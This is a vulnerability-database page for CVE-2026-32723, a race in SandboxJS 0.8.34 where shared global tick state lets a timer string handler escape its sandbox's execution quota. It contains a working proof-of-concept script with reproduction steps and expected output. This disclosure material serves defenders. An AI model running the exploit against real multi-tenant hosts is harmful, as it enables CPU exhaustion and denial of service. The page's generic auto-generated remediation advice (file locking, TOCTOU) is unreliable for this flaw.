Node.js CVE-2026-32723
MEDIUMLifecycle Timeline
3DescriptionCVE.org
Summary
Assumed repo path is /Users/zwique/Downloads/SandboxJS-0.8.34 (no /Users/zwique/Downloads/SandboxJS found). A global tick state (currentTicks.current) is shared between sandboxes. Timer string handlers are compiled at execution time using that global tick state rather than the scheduling sandbox's tick object. In multi-tenant / concurrent sandbox scenarios, another sandbox can overwrite currentTicks.current between scheduling and execution, causing the timer callback to run under a different sandbox's tick budget and bypass the original sandbox's execution quota/watchdog.
Impact: execution quota bypass → CPU/resource abuse
---
Details
- Affected project: SandboxJS (owner: nyariv)
- Assumed checked-out version:
SandboxJS-0.8.34at/Users/zwique/Downloads/SandboxJS-0.8.34
Vulnerable code paths
/src/eval.ts-sandboxFunctionbindsticksusingticks || currentTicks.current:
createFunction(..., ticks || currentTicks.current, { ...context, ... })Relevant lines: 44, 53, 164, 167.
/src/evaluator.ts//src/executor.ts- global ticks:
export const currentTicks = { current: { ticks: BigInt(0) } as Ticks };and
_execNoneRecurse(...) { currentTicks.current = ticks; ... }Relevant lines: ~1700, 1712.
sandboxedSetTimeoutcompiles string handlers at execution time, not at scheduling time, which letscurrentTicks.currentbe the wrong sandbox's ticks when compilation occurs.
---
Why This Is Vulnerable
currentTicks.currentis global mutable state shared across all sandbox instances.- Timer string handlers are compiled at the moment the timer fires and read
currentTicks.currentat that time. If another sandbox runs between scheduling and execution, it can replacecurrentTicks.current. The scheduled timer's code will be compiled/executed with the other sandbox's tick budget. This allows the original sandbox's execution quota to be bypassed.
---
Proof of Concept
> Run with Node.js; adjust path if needed.
// PoC (run with node); adjust path if needed
import Sandbox from '/Users/zwique/Downloads/SandboxJS-0.8.34/node_modules/@nyariv/sandboxjs/build/Sandbox.js';
const globals = { ...Sandbox.SAFE_GLOBALS, setTimeout, clearTimeout };
const prototypeWhitelist = Sandbox.SAFE_PROTOTYPES;
const sandboxA = new Sandbox({
globals,
prototypeWhitelist,
executionQuota: 50n,
haltOnSandboxError: true,
});
let haltedA = false;
sandboxA.subscribeHalt(() => { haltedA = true; });
const sandboxB = new Sandbox({ globals, prototypeWhitelist });
// Sandbox A schedules a heavy string handler
sandboxA.compile(
'setTimeout("let x=0; for (let i=0;i<200;i++){ x += i } globalThis.doneA = true;", 0);'
)().run();
// Run sandbox B before A's timer fires
sandboxB.compile('1+1')().run();
setTimeout(() => {
console.log({ haltedA, doneA: sandboxA.context.sandboxGlobal.doneA });
}, 50);Reproduction Steps
- Place the PoC in
hi.jsand run:
node /Users/zwique/Downloads/SandboxJS-0.8.34/hi.js- Observe output similar to:
{ haltedA: false, doneA: true }This indicates the heavy loop completed and the quota was bypassed.
- Remove the
sandboxB.compile('1+1')().run();line and rerun. Output should now be:
{ haltedA: true }This indicates quota enforcement is working correctly.
---
Impact
- Type: Runtime guard bypass (execution-quota / watchdog bypass)
- Who is impacted: Applications that run multiple SandboxJS instances concurrently in the same process - multi-tenant interpreters, plugin engines, server-side scripting hosts, online code runners.
- Practical impact: Attackers controlling sandboxed code can bypass configured execution quotas/watchdog and perform CPU-intensive loops or long-running computation, enabling resource exhaustion/DoS or denial of service against the host process or other tenants.
- Does not (as tested) lead to: Host object exposure or direct sandbox escape (no
process/requireleakage observed from this primitive alone). Escalation to RCE was attempted and not observed.
AnalysisAI
SandboxJS 0.8.34 contains a race condition where a shared global tick state allows concurrent sandboxes to interfere with each other's execution quotas during timer callback compilation. An attacker in a multi-tenant environment can exploit this to bypass resource limits and exhaust CPU/memory on the host system. A patch is available.
Technical ContextAI
A race condition occurs when the behavior of software depends on the timing of events, such as the order of execution of threads or processes.
RemediationAI
A vendor patch is available — apply it immediately. Use proper synchronization mechanisms (locks, mutexes, atomic operations). Implement file locking for filesystem operations. Avoid TOCTOU patterns.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-362 – Race Condition
View allSame technique Race Condition
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-7p5m-xrh7-769r